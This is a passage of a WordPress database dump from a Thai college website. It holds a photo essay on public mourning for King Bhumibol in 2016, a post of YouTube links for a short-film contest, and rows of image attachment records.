ร่วมกันทําพิธีสวดดุอาอ์ถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ชุมชนมุสลิมเก่าแก่ย่านบางกอกใหญ่แห่งนี้ครั้งหนึ่งกษัตริย์สองพี่น้อง ในหลวงรัชกาลที่ 8 และในหลวงรัชกาลที่ 9 เคยเสด็จเยี่ยมเป็นการส่วนพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4487\" src=\"/wp-content/uploads/2018/11/14-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้และจุดเทียนน้อมถวายอาลัยในวันที่ 5 ธันวาคม พ.ศ. ๒๕๕๙ ซึ่งเป็นวันคล้ายวันพระราชสมภพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพฯ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">นักศึกษาภาควิชาวิจิตรศิลป์ คณะสถาปัตยกรรมศาสตร์</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4488\" src=\"/wp-content/uploads/2018/11/18-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง ร่วมกันวาดพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 พร้อมน้อมนําพระราชดํารัส “เสียใจได้ แต่อย่าละเลยหน้าที่” มาเขียนประกอบภาพวาดด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">มูลนิธิพระคชบาล ได้นําช้าง 11 เชือก จากวังช้างอยุธยา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4490\" src=\"/wp-content/uploads/2018/11/19-Chanklang-Kanthong-copy-1024x581.jpg\" alt=\"\" width=\"640\" height=\"363\" />\r\n<p style=\"text-align: center;\">พร้อมด้วยควาญช้างกลุ่มคชสารราว 200 คน เดินทางไปถวายความอาลัย และสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณหน้าประตูมณีนพรัตน์ พระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“มอเตอร์ไซค์จิตอาสา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4491\" src=\"/wp-content/uploads/2018/11/22-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">มอเตอร์ไซค์จิตอาสาให้บริการรับ-ส่งฟรี สําหรับประชาชนที่เดินทางมาถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ บริเวณโดยรอบสนามหลวง “ตั้งใจจะมาจนกว่าจะเสร็จพระราชพิธีถวายพระเพลิงพระบรมศพเลยครับ” จิตอาสารายหนึ่งกล่าว</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4492\" src=\"/wp-content/uploads/2018/11/25-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4493\" src=\"/wp-content/uploads/2018/11/31-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นางไพเราะ เยอเบาะ หญิงชาวอาข่า หนึ่งใน 999 คน จาก 9 ชนเผ่าที่สูงที่เข้าถวายสักการะพระบรมศพ ณ พระที่นั่งดุสิตมหาปราสาท ได้โชว์เหรียญพระราชทานเพื่อใช้แทนบัตรประชาชนในอดีต จากในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">เจ้าหน้าที่พยาบาลพยุงนักเรียนพยาบาลที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4494\" src=\"/wp-content/uploads/2018/11/33-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">จัดขึ้นโดย โรงพยาบาลจุฬาลงกรณ์ สภากาชาดไทย ร่วมกับคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย เพื่อรําลึกถึงพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ ลานหน้าพระบรมราชานุสาวรีย์ รัชกาลที่ ๖ สวนลุมพินี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ทําดีเพื่อพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4495\" src=\"/wp-content/uploads/2018/11/40-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ธวิน ปินะถา หรือ “เพ็ชรน้อยหัวใจเพชร”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4496\" src=\"/wp-content/uploads/2018/11/46-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชายหนุ่มขาพิการทั้งสองข้าง เดินทางจากบ้านเกิดในจังหวัดมหาสารคามมายังพระบรมมหาราชวังด้วยความมุ่งมั่นอุตสาหะเป็นระยะทางกว่า 500 กิโลเมตร ด้วยจักรยานคู่ชีพที่ประกอบขึ้นเอง เพื่อมาสักการะพระบรมศพ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“บนเส้นทาง คําสอนของพ่อ 70 ปี ที่ครองราชย์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4497\" src=\"/wp-content/uploads/2018/11/47-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4498\" src=\"/wp-content/uploads/2018/11/48-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนต่างพากันเข้าไปสัมผัสเปลือกไม้จันทน์หอม แล้วนํามาแตะหน้าผากของตนเพื่อความเป็นสิริมงคล ขณะเข้าร่วมพิธีบวงสรวงตัดไม้จันทน์หอม 12 ต้น ที่ยืนต้นตายธรรมชาติในพื้นที่อุทยานแห่งชาติกุยบุรี จังหวัดประจวบคีรีขันธ์เพื่อนํามาจัดสร้างพระโกศทรงพระบรมศพเหนือพระจิตกาธานบนพระเมรุมาศ ในงานพระราชพิธีถวายพระเพลิงพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ประชาชนร่วมจุดเทียนแสดงความอาลัย ณ โรงพยาบาลศิริราช</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4499\" src=\"/wp-content/uploads/2018/11/61-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เพื่อถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เสด็จสวรรคตครบ 1 เดือน</p>\r\n<img class=\"aligncenter size-large wp-image-4500\" src=\"/wp-content/uploads/2018/11/82-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้ และจุดเทียนน้อมถวายความอาลัยในวันที่ 5 ธันวาคม พ.ศ. 2559 ซึ่งเป็นวันคล้ายวันพระราชสมภพของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพมหานคร</p>\r\n<img class=\"aligncenter size-large wp-image-4501\" src=\"/wp-content/uploads/2018/11/83-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่วัดบวรนิเวศวิหาร ลั่นฆ้องตีกลองก่อนที่พระภิกษุจะประกอบพิธีสวดเจริญพระพุทธมนต์ เจริญชัยมงคลคาถา ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามมกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็ นพระมหากษัตริย์รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ข้าราชการ ประชาชน และนักเรียนนักศึกษาต่างรวมตัวกัน</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4502\" src=\"/wp-content/uploads/2018/11/84-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เป็นจิตอาสา เพื่อร่วมทําความดีถวายเป็นพระราชกุศลแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในภาพเป็นการให้บริการตัดผมฟรีที่บริเวณสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">พิพิธภัณฑ์รถโบราณ “เจษฎาเทคนิคมิวเซียม”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4503\" src=\"/wp-content/uploads/2018/11/85-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นํารถโบราณมารับส่งประชาชนในเส้นทางรอบสนามหลวงโดยไม่คิดค่าบริการ เพื่อร่วมทําความดีถวาย แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจอาสา ทําดีเพื่อพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4504\" src=\"/wp-content/uploads/2018/11/86-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4505\" src=\"/wp-content/uploads/2018/11/88-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ร้านขายเสื้อผ้าเกือบทุกร้านในย่านบางลําพู นําเสื้อผ้าสีดําและสีขาวมาวางจําหน่าย</p>\r\n<img class=\"aligncenter size-large wp-image-4506\" src=\"/wp-content/uploads/2018/11/89-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชายเจ้าของร้านค้าแห่งหนึ่งในบริเวณแยกสะพานเฉลิมวันชาติ เขตพระนคร นําพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 10 ออกมาตั้งหน้าร้าน เช่นเดียวกับร้านค้าอีกหลายแห่งในย่านนี้ที่จําหน่ายสินค้าซึ่งเกี่ยวข้องกับสถาบันพระมหากษัตริย์ เช่น ธงชาติ ธงเฉลิมพระเกียรติ ภาพของพระบรมวงศานุวงศ์ที่เริ่มนําพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 10 ออกมาตั้งโชว์และจําหน่ายมากขึ้น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“วันที่ 100”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4507\" src=\"/wp-content/uploads/2018/11/90-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4508\" src=\"/wp-content/uploads/2018/11/94-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พนักงานต้อนรับหญิงในสถานบันเทิงย่านอโศกหรือที่รู้จักกันว่า “ซอยคาวบอย” ร่วมใจกันสวมชุดสีดํา เช่นเดียวกับร้านต่าง ๆ ที่ลดป้ายแสงสีลงเพื่อเป็นการถวายความไว้อาลัยแด่ในหลวงรัชกาลที่ 9 เป็นระยะเวลา 1 เดือน</p>\r\n<img class=\"aligncenter size-large wp-image-4509\" src=\"/wp-content/uploads/2018/11/98-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4510\" src=\"/wp-content/uploads/2018/11/99-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n ', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'inherit', 'closed', 'closed', '', '4482-revision-v1', '', '', '2018-11-15 13:54:35', '2018-11-15 06:54:35', '', 4482, 'http://www.technicrayong.ac.th/4482-revision-v1/', 0, 'revision', '', 0),
(4534, 3, '2018-11-15 13:59:58', '2018-11-15 06:59:58', 'https://youtu.be/GwqyX1Gk5N0\r\n\r\nhttps://youtu.be/T10s06PGMHI\r\n\r\nhttps://youtu.be/ckSfZebcsik\r\n\r\nhttps://youtu.be/E74lDuIBBQA\r\n\r\nhttps://youtu.be/4KA6AsI33Z0\r\n\r\nhttps://youtu.be/riq-rXXRrho\r\n\r\nhttps://youtu.be/l2WJsXiMBDw\r\n\r\nhttps://youtu.be/HL5n3aSpNCA\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-revision-v1', '', '', '2018-11-15 13:59:58', '2018-11-15 06:59:58', '', 4478, 'http://www.technicrayong.ac.th/4478-revision-v1/', 0, 'revision', '', 0),
(4536, 3, '2018-11-15 14:00:46', '2018-11-15 07:00:46', '', '8-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '8-roengchai-kongmuang-copy', '', '', '2018-11-15 14:00:46', '2018-11-15 07:00:46', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/8-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4537, 3, '2018-11-15 14:00:54', '2018-11-15 07:00:54', '', '20-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '20-roengchai-kongmuang-copy', '', '', '2018-11-15 14:00:54', '2018-11-15 07:00:54', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/20-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4538, 3, '2018-11-15 14:01:06', '2018-11-15 07:01:06', '', '39-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '39-roengchai-kongmuang-copy', '', '', '2018-11-15 14:01:06', '2018-11-15 07:01:06', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/39-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4539, 3, '2018-11-15 14:01:21', '2018-11-15 07:01:21', '', 'ผู้ต้องขังกราบสักการะ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%87%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%9a%e0%b8%aa%e0%b8%b1%e0%b8%81%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%b0', '', '', '2018-11-16 09:19:42', '2018-11-16 02:19:42', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/49-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4540, 3, '2018-11-15 14:01:35', '2018-11-15 07:01:35', '', '58-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '58-roengchai-kongmuang-copy', '', '', '2018-11-15 14:01:35', '2018-11-15 07:01:35', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/58-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4541, 3, '2018-11-15 14:01:49', '2018-11-15 07:01:49', '', '65-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '65-roengchai-kongmuang-copy', '', '', '2018-11-15 14:01:49', '2018-11-15 07:01:49', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/65-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4542, 3, '2018-11-15 14:01:59', '2018-11-15 07:01:59', '', '69-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '69-roengchai-kongmuang-copy', '', '', '2018-11-15 14:01:59', '2018-11-15 07:01:59', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/69-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4543, 3, '2018-11-15 14:02:11', '2018-11-15 07:02:11', '', '78-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '78-roengchai-kongmuang-copy', '', '', '2018-11-15 14:02:11', '2018-11-15 07:02:11', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/78-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4544, 3, '2018-11-15 14:02:22', '2018-11-15 07:02:22', '', '80-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '80-roengchai-kongmuang-copy', '', '', '2018-11-15 14:02:22', '2018-11-15 07:02:22', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/80-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4545, 3, '2018-11-15 14:02:40', '2018-11-15 07:02:40', '', '92-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '92-roengchai-kongmuang-copy', '', '', '2018-11-15 14:02:40', '2018-11-15 07:02:40', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/92-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4546, 3, '2018-11-15 14:02:52', '2018-11-15 07:02:52', '', '93-Roengchai Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '93-roengchai-kongmuang-copy', '', '', '2018-11-15 14:02:52', '2018-11-15 07:02:52', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/93-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4547, 3, '2018-11-15 14:03:03', '2018-11-15 07:03:03', '', 'ฉบับพิเศษ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%89%e0%b8%9a%e0%b8%b1%e0%b8%9a%e0%b8%9e%e0%b8%b4%e0%b9%80%e0%b8%a8%e0%b8%a9', '', '', '2018-11-16 09:33:05', '2018-11-16 02:33:05', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/95-Roengchai-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4548, 3, '2018-11-15 14:05:08', '2018-11-15 07:05:08', '', '10-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '10-roengrit-kongmuang-copy', '', '', '2018-11-15 14:05:08', '2018-11-15 07:05:08', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/10-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4549, 3, '2018-11-15 14:05:21', '2018-11-15 07:05:21', '', '13-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '13-roengrit-kongmuang-copy', '', '', '2018-11-15 14:05:21', '2018-11-15 07:05:21', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/13-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4550, 3, '2018-11-15 14:05:33', '2018-11-15 07:05:33', '', '15-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '15-roengrit-kongmuang-copy', '', '', '2018-11-15 14:05:33', '2018-11-15 07:05:33', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/15-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4551, 3, '2018-11-15 14:05:46', '2018-11-15 07:05:46', '', '16-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '16-roengrit-kongmuang-copy', '', '', '2018-11-15 14:05:46', '2018-11-15 07:05:46', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/16-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4552, 3, '2018-11-15 14:06:01', '2018-11-15 07:06:01', '', '35-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '35-roengrit-kongmuang-copy', '', '', '2018-11-15 14:06:01', '2018-11-15 07:06:01', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/35-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4553, 3, '2018-11-15 14:06:14', '2018-11-15 07:06:14', '', '36-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '36-roengrit-kongmuang-copy', '', '', '2018-11-15 14:06:14', '2018-11-15 07:06:14', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/36-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4554, 3, '2018-11-15 14:06:25', '2018-11-15 07:06:25', '', '51-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '51-roengrit-kongmuang-copy', '', '', '2018-11-15 14:06:25', '2018-11-15 07:06:25', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/51-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4555, 3, '2018-11-15 14:06:37', '2018-11-15 07:06:37', '', '52-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '52-roengrit-kongmuang-copy', '', '', '2018-11-15 14:06:37', '2018-11-15 07:06:37', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/52-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4556, 3, '2018-11-15 14:06:49', '2018-11-15 07:06:49', '', '79-Roengrit Kongmuang copy', '', 'inherit', 'closed', 'closed', '', '79-roengrit-kongmuang-copy', '', '', '2018-11-15 14:06:49', '2018-11-15 07:06:49', '', 4478, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/79-Roengrit-Kongmuang-copy.jpg', 0, 'attachment', 'image/jpeg', 0),
(4558, 1, '2018-11-15 22:14:10', '2018-11-15 15:14:10', '', 'ประกาศ-อวท-2561-01', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-01', '', '', '2018-11-15 22:14:10', '2018-11-15 15:14:10', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-01.png', 0, 'attachment', 'image/png', 0),
(4559, 1, '2018-11-15 22:14:22', '2018-11-15 15:14:22', '', 'ประกาศ-อวท-2561-02', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-02', '', '', '2018-11-15 22:14:22', '2018-11-15 15:14:22', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-02.png', 0, 'attachment', 'image/png', 0),
(4560, 1, '2018-11-15 22:14:35', '2018-11-15 15:14:35', '', 'ประกาศ-อวท-2561-03', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-03', '', '', '2018-11-15 22:14:35', '2018-11-15 15:14:35', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-03.png', 0, 'attachment', 'image/png', 0),
(4561, 1, '2018-11-15 22:14:57', '2018-11-15 15:14:57', '', 'ประกาศ-อวท-2561-04', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-04', '', '', '2018-11-15 22:14:57', '2018-11-15 15:14:57', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-04.png', 0, 'attachment', 'image/png', 0),
(4562, 1, '2018-11-15 22:15:05', '2018-11-15 15:15:05', '', 'ประกาศ-อวท-2561-05', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-05', '', '', '2018-11-15 22:15:05', '2018-11-15 15:15:05', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-05.png', 0, 'attachment', 'image/png', 0),
(4563, 1, '2018-11-15 22:15:11', '2018-11-15 15:15:11', '', 'ประกาศ-อวท-2561-06', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-06', '', '', '2018-11-15 22:15:11', '2018-11-15 15:15:11', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-06.png', 0, 'attachment', 'image/png', 0),
(4564, 1, '2018-11-15 22:15:29', '2018-11-15 15:15:29', '', 'ประกาศ-อวท-2561-07', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-07', '', '', '2018-11-15 22:15:29', '2018-11-15 15:15:29', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-07.png', 0, 'attachment', 'image/png', 0),
(4565, 1, '2018-11-15 22:15:45', '2018-11-15 15:15:45', '', 'ประกาศ-อวท-2561-08', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-08', '', '', '2018-11-15 22:15:45', '2018-11-15 15:15:45', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-08.png', 0, 'attachment', 'image/png', 0),
(4566, 1, '2018-11-15 22:16:09', '2018-11-15 15:16:09', '', 'ประกาศ-อวท-2561-09', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-09', '', '', '2018-11-15 22:16:09', '2018-11-15 15:16:09', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-09.png', 0, 'attachment', 'image/png', 0),
(4567, 1, '2018-11-15 22:16:31', '2018-11-15 15:16:31', '', 'ประกาศ-อวท-2561-10', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%ad%e0%b8%a7%e0%b8%97-2561-10', '', '', '2018-11-15 22:16:31', '2018-11-15 15:16:31', '', 4280, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-อวท-2561-10.png', 0, 'attachment', 'image/png', 0),
